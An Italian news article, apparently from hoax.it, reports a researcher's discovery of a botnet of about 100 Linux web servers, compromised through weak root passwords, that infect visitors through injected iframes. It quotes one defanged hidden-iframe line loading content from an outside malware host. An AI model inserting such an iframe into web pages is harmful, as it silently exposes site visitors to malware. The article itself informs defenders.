Nuovo attacco ai server web Linux, botnet via iframe apache e nginx
Si tratta di :Exploits
Denis Sinegubko, si occupa di sicurezza in Russia, ha scoperto un gruppo di circa 100 server Linux infetti (una botnet) interconnessi tra loro. Si tratta di un gruppo di server web infetti e connessi tra loro che diffondono malware, con lo scopo di creare una rete di computer (server web) che infettano i visitatori di siti web, questa attività è stata scoperta analizzando alcuni server con installato apache con password di root facili, combinando mediante la tecnica iframe server esterni con installato il server nginx si è potuto inserire con successo nelle pagine stringhe all’interno del server vittima fatte in questa maniera :
<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
Tale tecnica non fa altro che aumentare le macchine zombie.
Cosa avviene in parole semplici :
i server infetti osservati da Sinegubko legittimano il traffico web sulla porta 80,
la porta standard tcp per le connessioni al server. Il server rogue che gira avendo installato nginx potente server http e un mail proxy server sviluppato in russia da Igor Sysoev fa in modo che i computer degli utenti vengano infettati.
A complicare le cose e per aumentare la potenza virale ci si è messo pure l’aggiunta di reti basate su servizi che permettono la rintracciabilità di un computer in rete, ciò significa che esiste una rete di server tracciabile e una rete di computer che potenzialmente non avendo hosting fisso possono cambiare rapidamente dislocazione geografica.
Il tutto significa che nel momento in cui si lancia un comando alla botnet tutti i server infetti rispondono.
Secondo Sinegubko la responsabilità di tale diffusione è tutta degli amministratori di rete che mettono password poco sicure o che non proteggono il traffico di rete da eventuali sniffaggi di password di root.

Commenti Via Facebook
Commenti lasciati dagli ospiti, senza usare Facebook
Inserisci un Commento

- Appelli Generici: Kiwi pericolosissimi per la salute umana se associati con il consumo di vino rosso - Marzo 20th, 2016
- Appelli Umanitari Veri: Raccolta Fondi per aiutare la piccola Chanel - Luglio 25th, 2013
- avvenimenti: Fact-checking day, il 2 aprile a caccia della verità - Aprile 2nd, 2018
- Award and Press: Silvio Passalacqua of www.hoax.it go to Campus Party Europa - Aprile 24th, 2010
- Bufale e Hoax: Complotto UE contro l'Italia - Ottobre 12th, 2018
- Catene di Sant'Antonio: Allerta: Finto buono spesa McDonald's di 50 euro via Whatsapp - Ottobre 21st, 2018
- chainletters: salviette per i bambini Huggies con dentro i pezzi di vetro - Agosto 29th, 2015
- Curiosità: Il vescovo benedice i cellulari contro le fake-news “Padre santo proteggi chi usa il cellulare” - Storia Vera - Febbraio 5th, 2018
- English Articles: Vulnerability Summary for the Week of March 7, 2016 - Marzo 21st, 2016
- Exploits: Vulnerabilità Chip Qualcomm e anche gli smartphone e tablet Android sono a rischio - Agosto 10th, 2016
- hoax: Complotto UE contro l'Italia - Ottobre 12th, 2018
- hoaxes: New Scam from Mr.Ahmed Bello - I NEED YOUR URGENT ASSISTANCE! - Marzo 25th, 2011
- ICT and Computer Security: Vulnerability Summary for the Week of March 7, 2016 - Marzo 21st, 2016
- ingegneria sociale: Bufala / Truffa, Finti premi e Vincite di Portatile o Smartphone o altri premi Google - Luglio 13th, 2016
- Leggende Metropolitane: I comunisti mangiano i bambini... - Ottobre 31st, 2018
- News: «Incappucciati picchiano di notte» Scatta l’indagine ma era una bufala - Febbraio 15th, 2017
- news: Tea Party movement - Ottobre 15th, 2010
- Phishing e Truffe: Allerta: Finto buono spesa McDonald's di 50 euro via Whatsapp - Ottobre 21st, 2018
- sentenze: G.U.P. Tribunale di Brescia, Sentenza 3 marzo 2011 (dep. 30 marzo 2011), n. 293 - Aprile 25th, 2011
- Sicurezza: Vulnerabilità Chip Qualcomm e anche gli smartphone e tablet Android sono a rischio - Agosto 10th, 2016
- Storielle e Aneddoti: libera, liberi ma liberamente o no liberi di fare COSE LIBERAMENTE - Maggio 16th, 2010
- Truffe Smascherate dalla Tv: Soluzione di un caso di truffe on line... Striscia la Notizia - Luglio 17th, 2008
- Unsorted comments: relief fund worth 450.000.00 Pounds - Settembre 19th, 2011
Commenti
Non ci sono commenti.